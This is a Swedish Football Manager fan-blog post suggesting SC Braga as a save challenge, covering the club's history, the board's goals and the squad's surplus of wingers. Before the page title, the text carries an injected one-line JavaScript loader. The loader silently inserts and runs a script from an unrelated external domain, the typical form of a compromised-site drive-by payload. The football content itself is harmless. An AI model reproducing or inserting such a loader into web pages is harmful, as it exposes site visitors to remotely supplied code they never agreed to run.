;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: SC Braga – FMSweden
Meny Stäng

Veckans inspiration: SC Braga

Sporting Clube de Braga grundades 1921 och har under det senaste decenniet varit stabila kring plats 3-4 i den portugisiska Liga NOS. Fortsatt har de dock svårt att rubba de tre stora klubbarna i landet i form av Porto, Sporting och Benfica. Arenan Estádio Municipal de Braga – som Fabian skrev om i veckans blogg – har en kapacitet på cirka 30 000 åskådare och faciliteterna ser riktigt fina ut. De har vunnit ligacupen 2016 och cupen 2020 och inte minst Intertotocupen 2008. Så prisskåpet är alltså inte helt tomt. Men utmaningen för dig med denna save är förstås solklar: att peta ner de tre stora från tronen och etablera Braga som bäst i landet. Vidare går det förstås även att få ligan att klättra något i rankingen och kanske gå förbi Frankrike på sikt till exempel.

På FM vill styrelsen att du utvecklar egna spelare, värvar unga spelare och spela anfallsfotboll. Dessutom är det uppskattat om du köper spelare som går att sälja med vinst, för att förbättra klubbens ekonomi på sikt. Tävlingsmässigt vill de att du går vidare till slutspel i Europa League, semifinal i cupen och kommer topp-3 i ligan. Inte helt givet, med andra ord. Bland de mer namnkunniga spelarna finns Ricardo Esgaio, Lucas Piazon och Nicolas Gaitan. Bröderna Horta – Ricardo och André – är också vassa offensiva hot. Åldersmässigt befinner sig flera spelare i sin bästa ålder 25-30 år, med ett fåtal på bägge sidor om det åldersspannet. Enligt rapporter är ytter den bästa positionen för hela åtta (!) spelare, medan endast fyra passar bäst som centrala mittfältare. Den obalansen kan du behöva åtgärda från start. I övrigt ser lagbygget ganska lovande ut. Lycka till om du tar dig an utmaningen! Kommentera gärna om du har några tidigare erfarenheter av klubben också.

 

SPORTING BRAGA.png

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar